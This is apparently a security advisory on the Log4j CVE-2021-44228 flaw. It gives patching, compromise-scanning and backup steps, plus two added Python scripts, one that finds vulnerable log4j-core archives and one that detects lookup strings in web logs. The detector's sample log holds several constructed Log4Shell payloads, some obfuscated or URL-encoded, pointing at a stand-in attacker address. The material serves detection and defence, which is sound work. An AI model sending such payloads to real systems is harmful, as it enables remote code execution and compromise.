A “zero-day” remote code execution vulnerability in Apache Log4j, a widely used Java logging library, is being actively exploited by threat actors. The flaw lets an unauthenticated attacker make a vulnerable application fetch and run attacker-supplied code simply by getting a crafted string into something the application logs. The code run this way could include malware such as cryptominers and ransomware.
The vulnerability is tracked as CVE-2021-44228 and affects Log4j 2 from version 2.0-beta9 up to and including 2.14.1 (Log4j 1.x is not affected by this CVE). It is fixed by upgrading: from Log4j 2.15.0 the message lookup behaviour the exploit relies on (JNDI lookups resolved inside logged strings) is disabled by default.
What to do
Apply the latest security patches
- Follow Apache's guidance and upgrade every affected Log4j installation to the latest release (2.15.0 at the time of writing). Remember that Log4j is usually bundled inside applications and appliances rather than installed on its own, so ask your vendors which of their products are affected.
- Once patched, rotate passwords and other credentials (API keys, service account secrets) stored on or reachable from the affected systems, since an attacker who ran code there may have read them.
- This is also a good time to enable multi-factor authentication if you have not already done so.
- If you are unable to apply the latest patch, follow the mitigation measures Apache publishes at https://logging.apache.org/log4j/2.x/security.html
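Knowing which Log4j copies you actually have is the hard part of patching, because the library is usually buried inside application archives. The following script is an added example, not part of the original advisory or of Apache's tooling. It walks a directory, opens every .jar/.war/.ear (and archives nested inside them), reads the version from the Maven pom.properties that log4j-core ships with, and checks whether the JndiLookup class is still present, since a JAR from which that class has been deleted (one of the mitigations Apache documents) cannot be exploited even if its version is old. The archives built by build_fixture() are constructed test data, not real Log4j binaries.

```python
"""Added example: find log4j-core copies below 2.15.0 on disk, including
copies bundled inside WAR/EAR files. Fixture archives are constructed."""
import io
import os
import re
import tempfile
import zipfile

POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED = (2, 15, 0)             # first release with message lookups off by default
ARCHIVE_EXT = (".jar", ".war", ".ear")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). Text after the digits is dropped."""
    parts = []
    for piece in text.strip().split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)


def is_vulnerable(version, has_jndi):
    """CVE-2021-44228 needs a 2.x core below 2.15.0 with JndiLookup.class present."""
    if not has_jndi:
        return False           # class removed: the lookup cannot run
    if version is None:
        return True            # JndiLookup present but version unknown: assume the worst
    v = parse_version(version)
    return v[:1] == (2,) and v < FIXED   # Log4j 1.x is not affected by this CVE


def inspect_archive(data, name):
    """Return [(name, version, has_jndi)] for each log4j-core in this archive
    or in any .jar/.war/.ear nested inside it."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        version = None
        if POM in names:
            for line in zf.read(POM).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_jndi = JNDI_CLASS in names
        if version is not None or has_jndi:
            findings.append((name, version, has_jndi))
        for inner in sorted(names):
            if inner.lower().endswith(ARCHIVE_EXT):
                findings.extend(inspect_archive(zf.read(inner), f"{name}!{inner}"))
    return findings


def scan_tree(root):
    """Return {archive_name: (version, vulnerable)} for every log4j-core under root.
    Names are relative to root with '/' separators so results are platform-stable."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for f in files:
            if not f.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, f)
            with open(path, "rb") as fh:
                data = fh.read()
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            for name, ver, jndi in inspect_archive(data, rel):
                results[name] = (ver, is_vulnerable(ver, jndi))
    return results


def build_fixture(root):
    """Constructed sample tree: fake archives carrying only the two entries we read."""
    def make(path, version, with_jndi):
        with zipfile.ZipFile(path, "w") as zf:
            zf.writestr(POM, f"version={version}\nartifactId=log4j-core\n")
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib)
    make(os.path.join(lib, "log4j-core-2.14.1.jar"), "2.14.1", True)            # vulnerable
    make(os.path.join(lib, "log4j-core-2.15.0.jar"), "2.15.0", True)            # fixed release
    make(os.path.join(lib, "log4j-core-2.14.1-stripped.jar"), "2.14.1", False)  # class removed
    inner = io.BytesIO()                        # a WAR bundling an old copy one level down
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(POM, "version=2.13.3\n")
        zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(os.path.join(root, "app", "site.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.13.3.jar", inner.getvalue())


def demo():
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_fixture(root)
    return scan_tree(root)


if __name__ == "__main__":
    for name, (ver, vuln) in sorted(demo().items()):
        print(f"{'VULNERABLE' if vuln else 'ok        '}  {ver or '?':8}  {name}")
```

Point scan_tree() at a real application directory to get the same report for your own systems. The check is only as good as the metadata: a shaded or repackaged Log4j without pom.properties but with JndiLookup.class is reported as vulnerable with an unknown version, which is the safe default and worth a manual look.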
Scan for compromise
- Have a suitably qualified member of your IT team or external IT vendor search for any unauthorised code running on, or unauthorised access to, your systems. Patching stops new exploitation but does not remove anything an attacker has already installed.
- If they find any indication that the vulnerability has been exploited, contact the Incident Management service immediately, before undertaking any patching or remediation work, via the 24/7 monitored email: [firstname.lastname@example.org] [email@example.com] including a contact telephone number and your insurance policy number.
- You will receive a call back from an Incident Manager within 2 hours (usually within 15 minutes) with further guidance on securing and restoring your network.
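One concrete place to start the search is your web server logs, since the exploit string has to arrive in something the application logs (request paths, headers such as User-Agent, usernames). The script below is an added example, not part of the original advisory: it decodes URL encoding and collapses the common obfuscations attackers use to hide the literal "jndi" (lower/upper lookups and default-value tricks such as ${::-j}), then reports every line that still contains a JNDI lookup and which protocol it points at. The log lines in SAMPLE_LOG are constructed, using documentation IP ranges, and are not from any real incident.

```python
"""Added example: flag Log4Shell-style lookup strings in web server logs,
including obfuscated forms. SAMPLE_LOG is constructed, not real traffic."""
import re
from urllib.parse import unquote

# Innermost lookups with brace-free bodies. ${lower:j} and ${upper:j} are kept as
# their literal text (matching is case-insensitive anyway); ${::-j} and
# ${env:NOPE:-j} evaluate to their default text, "j".
CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.I)
DEFAULT_LOOKUP = re.compile(r"\$\{([^${}]*?):-([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)?", re.I)


def normalise(text, rounds=10):
    """Undo single/double URL encoding, then collapse nested lookups until stable."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(rounds):
        new = CASE_LOOKUP.sub(lambda m: m.group(1), text)
        new = DEFAULT_LOOKUP.sub(lambda m: m.group(2), new)
        if new == text:
            break
        text = new
    return text


def find_jndi(line):
    """Return the lookup scheme ('ldap', 'rmi', 'dns', ...) if the line carries a
    JNDI lookup after de-obfuscation, otherwise None."""
    m = JNDI.search(normalise(line))
    if not m:
        return None
    return (m.group(1) or "unknown").lower()


def scan_log(lines):
    """Return [(line_number, scheme, normalised_line)] for each suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((n, scheme, normalise(line)))
    return hits


# Constructed Apache-style access log: one benign request, four exploit attempts
# (plain, lower-lookup, default-value, URL-encoded), and a benign mention of "jndi".
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:21:03:11 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:22:14:03 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.66:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:22:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:r}mi://203.0.113.66:1099/x}"',
    '203.0.113.5 - - [10/Dec/2021:22:14:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.66/a}"',
    '203.0.113.5 - - [10/Dec/2021:22:14:21 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.66%2Fb%7D HTTP/1.1" 200 612 "-" "curl/7.68.0"',
    '198.51.100.7 - - [10/Dec/2021:22:15:00 +0000] "GET /docs/jndi-tutorial HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, scheme, norm in scan_log(SAMPLE_LOG):
        print(f"line {n}: jndi/{scheme}: {norm}")
```

A hit is evidence of an attempt, not of compromise. Treat a line as a likely success when the same host shows an outbound LDAP, RMI or DNS connection to the address in the payload shortly afterwards, or when a new process or file appears on it; that is the point at which to stop and call the Incident Management service rather than patch over it. Run the scan against every log the affected application writes, not only the access log, because the payload lands wherever the attacker-controlled string was logged.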
Backup data and store offline
- It is sensible practice to back up data regularly and to keep a copy offline, where ransomware running on your network cannot reach it. Now is a sensible time to validate your own backup process: confirm that a recent backup exists, that you can actually restore from it, and that backups will continue to run regularly.